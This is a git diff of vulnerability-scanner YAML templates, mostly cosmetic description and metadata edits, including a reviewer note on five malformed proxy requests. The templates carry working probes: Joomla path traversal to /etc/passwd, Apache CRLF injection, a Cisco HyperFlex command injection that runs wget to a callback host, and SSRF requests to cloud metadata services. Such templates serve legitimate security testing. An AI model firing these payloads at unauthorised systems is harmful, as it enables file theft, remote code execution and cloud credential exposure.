@@ -4,24 +4,25 @@ info: name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php. + description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12150 - https://www.cvedetails.com/cve/CVE-2010-1476 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1476 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1478.yaml b/cves/2010/CVE-2010-1478.yaml index 850f9aa938..47844c9973 100644 --- a/cves/2010/CVE-2010-1478.yaml +++ b/cves/2010/CVE-2010-1478.yaml 
@@ -4,24 +4,26 @@ info: name: Joomla! Component Jfeedback 1.2 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: | - https://www.exploit-db.com/exploits/12145 - https://www.cvedetails.com/cve/CVE-2010-1478 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1478 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1491.yaml b/cves/2010/CVE-2010-1491.yaml index 865fd5f04f..1c5996a40d 100644 --- a/cves/2010/CVE-2010-1491.yaml +++ b/cves/2010/CVE-2010-1491.yaml 
@@ -4,24 +4,25 @@ info: name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12318 - https://www.cvedetails.com/cve/CVE-2010-1491 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1491 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1494.yaml b/cves/2010/CVE-2010-1494.yaml index 290ff32940..65870bc27c 100644 --- a/cves/2010/CVE-2010-1494.yaml +++ b/cves/2010/CVE-2010-1494.yaml 
@@ -4,24 +4,25 @@ info: name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12113 - https://www.cvedetails.com/cve/CVE-2010-1494 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1494 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1495.yaml b/cves/2010/CVE-2010-1495.yaml index 3d3b10b6bb..7cd0f3ba50 100644 --- a/cves/2010/CVE-2010-1495.yaml +++ b/cves/2010/CVE-2010-1495.yaml 
@@ -4,24 +4,25 @@ info: name: Joomla! Component Matamko 1.01 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12286 - https://www.cvedetails.com/cve/CVE-2010-1495 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1495 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1531.yaml b/cves/2010/CVE-2010-1531.yaml index c118f123cd..ff3ed174e0 100644 --- a/cves/2010/CVE-2010-1531.yaml +++ b/cves/2010/CVE-2010-1531.yaml 
@@ -4,24 +4,25 @@ info: name: Joomla! Component redSHOP 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12054 - https://www.cvedetails.com/cve/CVE-2010-1531 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1531 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2016/CVE-2016-4975.yaml b/cves/2016/CVE-2016-4975.yaml index f94762b21e..3be31a05a0 100644 --- a/cves/2016/CVE-2016-4975.yaml +++ b/cves/2016/CVE-2016-4975.yaml @@ -2,10 +2,14 @@ id: CVE-2016-4975 info: name: Apache mod_userdir CRLF injection - author: melbadry9,nadino,xElkomy,sullo - severity: low + author: melbadry9,nadino,xElkomy + severity: medium description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir. + remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher. tags: crlf,generic,cves,cve2016,apache + reference: + - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975 + - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 
@@ -16,9 +20,9 @@ requests: - method: GET path: - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" - matchers: - type: regex regex: - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' part: header +# Enhanced by cs on 2022/02/14 diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml index d7e5339d49..db00527c79 100644 --- a/cves/2021/CVE-2021-1497.yaml +++ b/cves/2021/CVE-2021-1497.yaml @@ -1,9 +1,8 @@ id: CVE-2021-1497 - info: name: Cisco HyperFlex HX Data Platform RCE description: Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. - author: gy741,sullo + author: gy741 severity: critical reference: - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/ @@ -19,7 +18,6 @@ info: cvss-score: 9.80 cve-id: CVE-2021-1497 cwe-id: CWE-78 - requests: - raw: - | @@ -27,23 +25,20 @@ requests: Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded - username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}} - | POST /auth HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded - username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}} - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" +# Enhanced by cs on 2022/02/14 diff --git a/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml index 383a94ea63..f4772ed916 100644 --- a/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml +++ b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml 
@@ -18,6 +18,7 @@ requests: - "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php" - "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php" - "{{BaseURL}}/phpmyadmin/setup/index.php" + - "{{BaseURL}}/pma/setup/index.php" stop-at-first-match: true matchers-condition: and diff --git a/misconfiguration/proxy/metadata-alibaba.yaml b/misconfiguration/proxy/metadata-alibaba.yaml index 224a5be859..885221149e 100644 --- a/misconfiguration/proxy/metadata-alibaba.yaml +++ b/misconfiguration/proxy/metadata-alibaba.yaml @@ -1,19 +1,17 @@ id: metadata-service-alibaba - # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfull to its -# own metadata sevice. +# the proxy using the full metadata URL, which the proxy will fulfill to its +# own metadata service. # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: Alibaba Metadata Service Check author: sullo severity: critical description: The Alibaba host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://www.alibabacloud.com/help/doc-detail/108460.htm - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ 
@@ -23,21 +21,19 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - requests: - raw: - |+ GET http://{{hostval}}/dynamic/instance-identity/document HTTP/1.1 Host: {{hostval}} - payloads: hostval: - alibaba.interact.sh - 100.100.100.200 - unsafe: true matchers: - type: word part: body words: - "zone-id" +# Enhanced by cs on 2022/02/14 diff --git a/misconfiguration/proxy/metadata-aws.yaml b/misconfiguration/proxy/metadata-aws.yaml index 3a5e11cb49..7e4c383c7e 100644 --- a/misconfiguration/proxy/metadata-aws.yaml +++ b/misconfiguration/proxy/metadata-aws.yaml @@ -1,19 +1,17 @@ id: metadata-service-aws - # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfull to its -# own metadata sevice. +# the proxy using the full metadata URL, which the proxy will fulfill to its +# own metadata service. # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: Amazon AWS Metadata Service Check author: sullo severity: critical description: The AWS host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure. Upgrade to IMDSv2. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ 
@@ -23,18 +21,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - requests: - raw: - |+ GET http://{{hostval}}/latest/meta-data/ HTTP/1.1 Host: {{hostval}} - payloads: hostval: - aws.interact.sh - 169.254.169.254 - unsafe: true matchers: - type: word @@ -43,3 +38,4 @@ requests: - "public-ipv4" - "privateIp" condition: or +# Enhanced by cs on 2022/02/14 diff --git a/misconfiguration/proxy/metadata-azure.yaml b/misconfiguration/proxy/metadata-azure.yaml index f5fb6656ff..d29c056c23 100644 --- a/misconfiguration/proxy/metadata-azure.yaml +++ b/misconfiguration/proxy/metadata-azure.yaml @@ -1,19 +1,17 @@ id: metadata-service-azure - # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfull to its -# own metadata sevice. +# the proxy using the full metadata URL, which the proxy will fulfill to its +# own metadata service. # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: Microsoft Azure Cloud Metadata Service Check author: sullo severity: critical description: The Microsoft Azure cloud host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://docs.microsoft.com/en-us/azure/virtual-machines/linux/instance-metadata-service?tabs=windows - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ 
@@ -23,19 +21,16 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - requests: - raw: - |+ GET http://{{hostval}}/metadata/instance?api-version=2021-02-01 HTTP/1.1 Host: {{hostval}} Metadata: true - payloads: hostval: - aws.interact.sh - 169.254.169.254 - unsafe: true matchers: - type: word @@ -44,3 +39,4 @@ requests: - "osType" - "ipAddress" condition: and +# Enhanced by cs on 2022/02/14 diff --git a/misconfiguration/proxy/metadata-digitalocean.yaml b/misconfiguration/proxy/metadata-digitalocean.yaml index 28f5b7cd0d..6139366823 100644 --- a/misconfiguration/proxy/metadata-digitalocean.yaml +++ b/misconfiguration/proxy/metadata-digitalocean.yaml @@ -1,19 +1,17 @@ id: metadata-service-digitalocean - # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfull to its -# own metadata sevice. +# the proxy using the full metadata URL, which the proxy will fulfill to its +# own metadata service. # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: DigitalOcean Metadata Service Check author: sullo severity: critical description: The DigitalOcean host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://developers.digitalocean.com/documentation/metadata/ - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ 
@@ -23,21 +21,19 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - requests: - raw: - |+ GET http://{{hostval}}/metadata/v1.json HTTP/1.1 Host: {{hostval}} - payloads: hostval: - aws.interact.sh - 169.254.169.254 - unsafe: true matchers: - type: word part: body words: - "droplet_id" +# Enhanced by cs on 2022/02/14 diff --git a/misconfiguration/proxy/metadata-google.yaml b/misconfiguration/proxy/metadata-google.yaml index 7f5be6d32f..df70242813 100644 --- a/misconfiguration/proxy/metadata-google.yaml +++ b/misconfiguration/proxy/metadata-google.yaml @@ -1,19 +1,17 @@ id: metadata-service-gcp - # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfull to its -# own metadata sevice. +# the proxy using the full metadata URL, which the proxy will fulfill to its +# own metadata service. # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: Google GCP Metadata Service Check author: sullo severity: critical description: The Google cloud (GCP) host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://cloud.google.com/compute/docs/metadata/default-metadata-values - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ 
@@ -23,22 +21,20 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - requests: - raw: - |+ GET http://{{hostval}}/computeMetadata/v1/project/ HTTP/1.1 Host: {{hostval}} Metadata-Flavor: Google - payloads: hostval: - aws.interact.sh - 169.254.169.254 - unsafe: true matchers: - type: word part: body words: - "attributes/" +# Enhanced by cs on 2022/02/14 diff --git a/misconfiguration/proxy/metadata-hetzner.yaml b/misconfiguration/proxy/metadata-hetzner.yaml index 82e837e888..fb6744c9bd 100644 --- a/misconfiguration/proxy/metadata-hetzner.yaml +++ b/misconfiguration/proxy/metadata-hetzner.yaml @@ -1,19 +1,17 @@ id: metadata-service-hetzner - # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfull to its -# own metadata sevice. +# the proxy using the full metadata URL, which the proxy will fulfill to its +# own metadata service. # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: Hetzner Cloud Metadata Service Check author: sullo severity: critical description: The Hetzner Cloud host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://docs.hetzner.cloud/#server-metadata - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ 
@@ -23,18 +21,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - requests: - raw: - |+ GET http://{{hostval}}/v1/metadata/private-networks HTTP/1.1 Host: {{hostval}} - payloads: hostval: - aws.interact.sh - 169.254.169.254 - unsafe: true matchers: - type: word @@ -44,3 +39,4 @@ requests: - "local-ipv4:" - "instance-id:" condition: or +# Enhanced by cs on 2022/02/14 diff --git a/misconfiguration/proxy/metadata-openstack.yaml b/misconfiguration/proxy/metadata-openstack.yaml index 6e215902a5..f5f729ae1f 100644 --- a/misconfiguration/proxy/metadata-openstack.yaml +++ b/misconfiguration/proxy/metadata-openstack.yaml @@ -1,5 +1,4 @@ id: metadata-service-openstack - # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to # the proxy using the full metadata URL, which the proxy will fulfull to its 
@@ -7,33 +6,34 @@ id: metadata-service-openstack # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: Openstack Metadata Service Check author: sullo severity: critical description: The Openstack host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://docs.openstack.org/nova/latest/admin/metadata-service.html - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ - https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/ tags: exposure,config,openstack,proxy,misconfig,metadata - + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N + cvss-score: 9.3 + cwe-id: CWE-441 requests: - raw: - |+ GET http://{{hostval}}/openstack/latest HTTP/1.1 Host: {{hostval}} - payloads: hostval: - aws.interact.sh - 169.254.169.254 - unsafe: true matchers: - type: word part: body words: - "vendor_data.json" +# Enhanced by cs on 2022/02/14 diff --git a/misconfiguration/proxy/metadata-oracle.yaml b/misconfiguration/proxy/metadata-oracle.yaml index cfdaa520a4..383d2a21b8 100644 --- a/misconfiguration/proxy/metadata-oracle.yaml +++ b/misconfiguration/proxy/metadata-oracle.yaml 
@@ -1,40 +1,40 @@ id: metadata-service-oracle - # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfull to its -# own metadata sevice. +# the proxy using the full metadata URL, which the proxy will fulfill to its +# own metadata service. # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: Oracle Cloud Metadata Service Check author: sullo severity: critical description: The Oracle cloud host is configured as a proxy which allows access to the instance metadata IMDSv1 service. This could allow significant access to the host/infrastructure. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://docs.oracle.com/en-us/iaas/Content/Compute/Tasks/gettingmetadata.htm - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ - https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/ tags: exposure,config,oracle,proxy,misconfig,metadata - + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N + cvss-score: 9.3 + cwe-id: CWE-441 requests: - raw: - |+ GET http://{{hostval}}/opc/v1/instance HTTP/1.1 Host: {{hostval}} Metadata: true - payloads: hostval: - aws.interact.sh - 169.254.169.254 - unsafe: true matchers: - type: word part: body words: - "availabilityDomain" +# Enhanced by cs on 2022/02/14 diff --git a/misconfiguration/proxy/open-proxy-internal.yaml b/misconfiguration/proxy/open-proxy-internal.yaml index 4dd01cf546..eddd4de2cb 100644 --- a/misconfiguration/proxy/open-proxy-internal.yaml 
+++ b/misconfiguration/proxy/open-proxy-internal.yaml @@ -1,12 +1,11 @@ id: open-proxy-internal - info: name: Open Proxy To Internal Network author: sullo severity: high tags: exposure,config,proxy,misconfig,fuzz description: The host is configured as a proxy which allows access to other hosts on the internal network. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. reference: - https://blog.projectdiscovery.io/abusing-reverse-proxies-internal-access/ - https://en.wikipedia.org/wiki/Open_proxy 
@@ -15,109 +14,83 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-441 - requests: - raw: - |+ GET / HTTP/1.1 Host: {{Hostname}} - - |+ GET http://192.168.0.1/ HTTP/1.1 Host: 192.168.0.1 - - |+ GET https://192.168.0.1/ HTTP/1.1 Host: 192.168.0.1 - - |+ GET http://192.168.0.1:22/ HTTP/1.1 Host: 192.168.0.1 - - |+ GET http://192.168.1.1/ HTTP/1.1 Host: 192.168.1.1 - - |+ GET https://192.168.1.1/ HTTP/1.1 Host: 192.168.1.1 - - |+ GET http://192.168.1.1:22/ HTTP/1.1 Host: 192.168.1.1 - - |+ GET http://192.168.2.1/ HTTP/1.1 Host: 192.168.2.1 - - |+ GET https://192.168.2.1/ HTTP/1.1 Host: 192.168.2.1 - - |+ GET http://192.168.2.1:22/ HTTP/1.1 Host: 192.168.2.1 - - |+ GET http:/10.0.0.1/ HTTP/1.1 Host: 10.0.0.1 - - |+ GET https://10.0.0.1/ HTTP/1.1 Host: 10.0.0.1 - - |+ GET http://10.0.0.1:22/ HTTP/1.1 Host: 10.0.0.1 - - |+ GET http:/172.16.0.1/ HTTP/1.1 Host: 172.16.0.1 - - |+ GET https://172.16.0.1/ HTTP/1.1 Host: 172.16.0.1 - - |+ GET http://172.16.0.1:22/ HTTP/1.1 Host: 172.16.0.1 - - |+ GET http:/intranet/ HTTP/1.1 Host: intranet - - |+ GET https://intranet/ HTTP/1.1 Host: intranet - - |+ GET http://intranet:22/ HTTP/1.1 Host: intranet - - |+ GET http:/mail/ HTTP/1.1 Host: mail - - |+ GET https://mail/ HTTP/1.1 Host: mail - - |+ GET http://mail:22/ HTTP/1.1 Host: mail - - |+ GET http:/ntp/ HTTP/1.1 Host: ntp - - |+ GET https://ntp/ HTTP/1.1 Host: ntp - - |+ GET http://ntp:22/ HTTP/1.1 Host: ntp - unsafe: true matchers: - type: dsl 
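Review bot: five of the raw requests in this hunk are malformed and should be fixed while the block is being rewritten: `GET http:/10.0.0.1/ HTTP/1.1`, `GET http:/172.16.0.1/ HTTP/1.1`, and likewise the `http:/intranet/`, `http:/mail/` and `http:/ntp/` entries have a single slash after `http:`, while their `https://` and `:22` siblings are well-formed. As written, body_11, body_14, body_17, body_20 and body_23 do not send the absolute-form request-target the check depends on, so those five hosts are effectively not tested over plain HTTP; change them to `http://...`.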
@@ -133,4 +106,5 @@ requests: - (!contains(body_1, "Microsoft Azure App")) && (contains(body_2, "Microsoft Azure App") || contains(body_3, "Microsoft Azure App")) || contains(body_4, "Microsoft Azure App") || contains(body_5, "Microsoft Azure App") || contains(body_6, "Microsoft Azure App") || contains(body_7, "Microsoft Azure App") || contains(body_8, "Microsoft Azure App") || contains(body_9, "Microsoft Azure App") || contains(body_10, "Microsoft Azure App") || contains(body_11, "Microsoft Azure App") || contains(body_12, "Microsoft Azure App") || contains(body_13, "Microsoft Azure App") || contains(body_14, "Microsoft Azure App") || contains(body_15, "Microsoft Azure App") || contains(body_16, "Microsoft Azure App") || contains(body_17, "Microsoft Azure App") || contains(body_18, "Microsoft Azure App") || contains(body_19, "Microsoft Azure App") || contains(body_20, "Microsoft Azure App") || contains(body_21, "Microsoft Azure App") || contains(body_22, "Microsoft Azure App") || contains(body_23, "Microsoft Azure App") - (!contains(body_1, "ssh")) && (contains(body_2, "ssh") || contains(body_3, "ssh")) || contains(body_4, "ssh") || contains(body_5, "ssh") || contains(body_6, "ssh") || contains(body_7, "ssh") || contains(body_8, "ssh") || contains(body_9, "ssh") || contains(body_10, "ssh") || contains(body_11, "ssh") || contains(body_12, "ssh") || contains(body_13, "ssh") || contains(body_14, "ssh") || contains(body_15, "ssh") || contains(body_16, "ssh") || contains(body_17, "ssh") || contains(body_18, "ssh") || contains(body_19, "ssh") || contains(body_20, "ssh") || contains(body_21, "ssh") || contains(body_22, "ssh") || contains(body_23, "ssh") || contains(body_24, "ssh") - (!contains(body_1, "SSH")) && (contains(body_2, "SSH") || contains(body_3, "SSH")) || contains(body_4, "SSH") || contains(body_5, "SSH") || contains(body_6, "SSH") || contains(body_7, "SSH") || contains(body_8, "SSH") || contains(body_9, "SSH") || contains(body_10, "SSH") || contains(body_11, 
"SSH") || contains(body_12, "SSH") || contains(body_13, "SSH") || contains(body_14, "SSH") || contains(body_15, "SSH") || contains(body_16, "SSH") || contains(body_17, "SSH") || contains(body_18, "SSH") || contains(body_19, "SSH") || contains(body_20, "SSH") || contains(body_21, "SSH") || contains(body_22, "SSH") || contains(body_23, "SSH") - condition: or \ No newline at end of file + condition: or +# Enhanced by cs on 2022/02/14 diff --git a/misconfiguration/proxy/open-proxy-localhost.yaml b/misconfiguration/proxy/open-proxy-localhost.yaml index 7fe8f1e90a..3a132a170e 100644 --- a/misconfiguration/proxy/open-proxy-localhost.yaml +++ b/misconfiguration/proxy/open-proxy-localhost.yaml @@ -1,12 +1,11 @@ id: open-proxy-http-portscan - info: name: Open Proxy to Other Web Ports on Proxy's localhost Interface author: sullo severity: high tags: exposure,config,proxy,misconfig,fuzz description: The host is configured as a proxy which allows access to web ports on the host's internal interface. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. reference: - https://blog.projectdiscovery.io/abusing-reverse-proxies-internal-access/ - https://en.wikipedia.org/wiki/Open_proxy @@ -15,33 +14,26 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-441 - requests: - raw: - |+ GET / HTTP/1.1 Host: {{Hostname}} - - |+ GET http://somethingthatdoesnotexist/ HTTP/1.1 Host: somethingthatdoesnotexist - - |+ GET http://127.0.0.1/ HTTP/1.1 Host: 127.0.0.1 - - |+ GET https://127.0.0.1/ HTTP/1.1 Host: 127.0.0.1 - - |+ GET http://localhost/ HTTP/1.1 Host: localhost - - |+ GET https://localhost/ HTTP/1.1 Host: localhost - unsafe: true req-condition: true stop-at-first-match: true 
